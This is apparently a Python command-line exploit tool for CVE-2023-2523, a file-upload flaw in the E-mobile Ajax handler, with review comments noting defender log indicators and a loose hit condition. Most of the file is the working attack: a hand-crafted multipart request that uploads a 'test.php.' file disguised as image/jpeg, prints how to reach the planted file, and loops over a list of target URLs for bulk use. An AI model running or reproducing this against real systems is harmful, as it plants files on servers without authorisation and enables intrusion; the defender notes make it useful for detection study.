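"""Command-line check for CVE-2023-2523 (file upload via the E-mobile Ajax handler).

The script posts a multipart upload to
``/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save`` on each target and
treats an HTTP 200 response whose body contains ``php`` as a hit.

For defenders, the observable indicators of this check in web-server or WAF
logs are a POST to that path and a multipart ``filename`` ending in ``.php.``
(extension followed by a trailing dot).
"""
import argparse

import requests

# Seconds to wait on connect/read. Without a timeout requests.post() can block
# indefinitely on a host that accepts the connection but never answers.
REQUEST_TIMEOUT = 10


def Banner():
    """Print the tool banner and the two usage examples."""
    # Raw string: the art is made of backslashes, and sequences such as "\ "
    # or "\_" are invalid escapes that newer Python versions warn about.
    # NOTE(review): the art's column spacing was already collapsed on the page
    # this was taken from; rows are split at their apparent boundaries and the
    # spacing is kept as found rather than guessed.
    banner = r"""
______ _______ ____ ___ ____ _____ ____ ____ ____ _
/ ___\ \ / / ____| |___ \ / _ \___ \|___ / |___ \| ___|___ \|___ /
| | \ \ / /| _| _____ __) | | | |__) | |_ \ _____ __) |___ \ __) | |_ \
| |___ \ V / | |__|_____/ __/| |_| / __/ ___) |_____/ __/ ___) / __/ ___) |
\____| \_/ |_____| |_____|\___/_____|____/ |_____|____/_____|____/
Usage:python3 CVE-2023-2523.py -u https://127.0.0.1:8080
Usage:python3 CVE-2023-2523.py -f urls.txt
"""
    print(banner)


def exploit_target(url, result_file):
    """Send the upload request to one target and record a positive result.

    Args:
        url: Base URL of the target (scheme, host and port, no trailing path).
        result_file: Open, writable text file; positives are appended to it.

    The check is not passive. The first multipart part is named
    ``upload_quwan`` and carries the filename ``test.php.`` declared as
    ``image/jpeg``; on a vulnerable host the request leaves that file in the
    attachment directory, so it has to be removed after verification.

    NOTE(review): the example path printed on a hit ends in ``test.php``,
    which suggests the server drops the trailing dot when saving; confirm
    against the vendor advisory.

    NOTE(review): the hit condition (status 200 and the substring ``php``
    anywhere in the body) is loose. Any 200 page that mentions "php" matches,
    so a reported hit is a candidate to confirm by hand, not a finding.

    Raises:
        requests.RequestException: the target could not be reached or did not
            answer within REQUEST_TIMEOUT seconds.
    """
    path = "/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save"
    full_url = url + path
    headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "Origin": "null",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
        "Connection": "close",
        # The boundary must match the one hard-coded in the body below.
        "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt"
    }
    # Hand-built multipart body: requests' files= helper is bypassed so the
    # part names, filenames and declared content types are sent exactly as
    # written here.
    data = (
        "------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\r\n"
        "Content-Disposition: form-data; name=\"upload_quwan\"; filename=\"test.php.\"\r\n"
        "Content-Type: image/jpeg\r\n"
        "\r\n"
        "\r\n"
        "------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\r\n"
        "Content-Disposition: form-data; name=\"file\"; filename=\"\"\r\n"
        "Content-Type: application/octet-stream\r\n"
        "\r\n"
        "\r\n"
        "------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--"
    )
    response = requests.post(
        full_url, headers=headers, data=data, timeout=REQUEST_TIMEOUT
    )
    if response.status_code == 200 and "php" in response.text:
        print(url + "[+] 漏洞存在,请根据输出结果,拼接出 phpinfo 的访问路径:")
        print(response.text)
        print("地址拼接举例::https://127.0.0.1:8080/attachment/1329245871/test.php")
        result_file.write(f"[+] 漏洞存在 - {url}\n")
        result_file.write(response.text)  # keep the raw response body in the result file
    else:
        print("[-] 漏洞不存在")


def main():
    """Parse -u/-f, run the check on every target and append hits to the result file."""
    parser = argparse.ArgumentParser(description="CVE-2023-2523 检测工具 by 冰糖葫芦(脚本使用phpinfo文件上传)")
    parser.add_argument("-u", "--target", help="单个目标URL")
    parser.add_argument("-f", "--file", help="包含多个目标URL的文件")
    args = parser.parse_args()

    if args.target:
        target_urls = [args.target]
    elif args.file:
        with open(args.file, "r") as f:
            # Skip blank lines and stray whitespace so an empty entry is not
            # turned into a request for a URL with no host.
            target_urls = [line.strip() for line in f if line.strip()]
    else:
        print("请使用 -u 指定目标 或 -f 指定目标文件")
        return

    # Context manager: the result file is closed even when a request raises.
    # UTF-8 is set explicitly because the records contain non-ASCII text and
    # the platform default encoding may not be able to represent it.
    with open("cve-2023-2523-result.txt", "a", encoding="utf-8") as result_file:
        for url in target_urls:
            exploit_target(url, result_file)


if __name__ == "__main__":
    Banner()
    main()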